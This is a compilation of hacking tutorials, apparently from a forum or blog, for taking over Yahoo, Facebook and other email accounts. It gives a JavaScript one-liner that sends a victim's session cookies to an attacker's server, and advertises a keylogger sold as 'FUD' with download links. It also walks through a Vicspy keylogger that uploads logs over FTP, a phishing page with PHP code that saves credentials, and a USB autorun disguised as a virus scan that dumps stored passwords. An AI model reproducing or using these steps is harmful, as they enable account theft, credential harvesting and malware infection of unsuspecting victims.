Hack Yahoo Account By Stealing Cookies (Session Hijacking)

HACK YAHOO ACCOUNT BY STEALING COOKIES (SESSION HIJACKING)

Author : CR@SH n Burn

I am gonna tell you how to hack any yahoo account by stealing cookies or we can say stealing session IDs.

First of all I want to tell you the basics of the cookies.

What are session cookies or session IDs?

Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just visit yahoo.com. Type in browser

Code:

javascript:alert(document.cookie);

You would get a pop up box showing you the cookies left by yahoo on our PC. 

Now login to your account and do same thing, you would see some more elements added to the cookies. These represent sessions ids.

So it means sessions are stored in our browser in form of cookies. 

An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out', session gets destroyed and attacker too also gets signed out.

But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Download the required script from here:

Cookie Stealer Script

Steps for stealing session cookies:

1. Sign Up for an account at any free web hosting site. 

I have chosen my3gb.com.

2. Now login to your account and go to file manager. 

3. Now upload the four files that you have just downloaded. And also make a new directory named 'cookies' here.

4. Now give this code to slave to run in his browser when he would be logged in to his yahoo account. 

Code:

javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Quote:

Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.

Stolen cookies get stored in directory 'cookies'

When the slave runs the code in his browser, he would again redirect to his yahoo account.

5. Now open the hacked.php. 

Url would be: http://yourdomain.com/hacked.php

And enter the password (Default password is CR@5H n BURN)

Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.

Now it doesn't matter if slave signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thanks

Credit goes to M. Makker

You can download the written guide from here(PDF):

http://hotfile.com/dl/109401527/8a29ad6/...s.rar.html

How To Hack Facebook/Myspace/Orkut Or Any Email

How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging
Fud Long Time

Rapzo Logger v 1.5 ( Public Edition )By Rapid

" Virus Results By Scan4you.net 0/32 "(Paid Host )

Options

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers


Steler Logs :





Who Wanna Change Assembly See This



Download LinkS


http://www.mediafire.com/?belchwxdl6z2xl9

http://akenload.com/download/141/RapZo_L..._.rar.html

http://www.megaupload.com/?d=IFRRHPBX

http://rapidshare.com/files/418946168/Ra...tion__.rar


By Rapidguide From Hacker Zone Blog

Hack Facebook/Twitter Or Any Email Account With Session Hijacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.

Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.

After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:

Double-click on someone, and you're instantly logged in as them.

That's it.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.

By  sarvesh

Hack Yahoo,Hotmail,Myspace,MSN account passwords

Hello Friends here is One More tutorial about hacking Facebook , Hotmail ,Yahoo ,Gmail ,Twitter ,orkut ,myspace and msn accounts with easy as 1 2 3 . In my previous article, I mentioned about  Armadax Key logger for Hacking Hotmail, Yahoo, Myspace and Msn account passwords.

Today i am Introducing a very effective key logger namely Vicspy key logger - the key logger that I found extremely Good and user-friendly for hacking hotmail, yahoo account passwords. I have provided link for software download and password ... So Enjoy and Let's Begin the Tutorial .

Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn Passwords

1. Download Vicspy keylogger for hacking Hotmail, Yahoo, msn ,myspace ,Face book And Gmail account passwords.

2. Extract the Rar to obtain Vicspy keylogger.

3. Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.

4. Now, in Servers , fill in the FTP server which you wanna use to receive logs from keylogger.

Fill in ftp server as:

ftp://user:pass@ftp.example.com/logs/

where:
# user: your username at ftp server.
# pass: your password.
# logs: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.
# ftp.example.com : your ftp server address. (eg: ftp.drivehq.com for drivehq ftp server)

After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.

5. In Control, check "Melt" to make key logger evaporate after installation on victim computer.

6. Additional Options included in Vicspy key logger are that you can
- Change keylogger file icon
- Bind key logger with another file to make it undetectable by victim.

7. Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.

8. Now, send this file to your victim and make him to install this binded keylogged file on his computer (Social engineering). You can crypt this keylogger file and then use Fake error message generator to make our key logger undetectable by antivirus.

Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.

That's ALL About Vicspy Key logger for hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn account passwords. Vicspy keylogger can also be used for hacking other email account passwords.

Hack Yahoo Messenger Account Password

..................................................................................................................................... .

Hack Yahoo Messenger Account Password: Yahoo Messenger 10 Password Stealer | Magic PS v1.5 SE++ | A tool for Kids & nOObs

• MPS is a Powerfull Password Sender for
• Yahoo! Messenger
• MPS sends victim id & pass to your id
• Work without any smtp and script
• Tested on Win98-Me-NT-2000-XP-Vista-7

Download Link Is Here

Hack Yahoo Messenger Account Password: Yahoo Messenger 10 Password Stealer | Magic PS v1.5 SE++ | A tool for Kids & nOObs

Hack yahoo accounts using fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.



Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page - Procedure


STEP 1.
Go to the Yahoo login page by typing the following URL.
mail.yahoo.com
STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.
STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .
STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML
STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=” Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”

Rename the above link into

src=” files/ma_mail_1.gif”

Repeat the same procedure for every file contained in the folder by name “files“.
Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.
STEP 6.
Now search for the following term
action=

you will see something like this

action= https://login.yahoo.com/config/login?

Edit this to

action= http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP

Tip: 110mb.com supports PHP
STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password
NOTE: The concept here is to save the password.The format is not important here.
STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of request

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

I have found one more working script if you have problem with this script try below one.
Download login script...........

How to Sniff/Hack Passwords Using USB Drive?

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as all files and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Yahoo Messenger multiple logins

Yahoo Messenger trick-How to open Multiple Yahoo Messenger???

1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's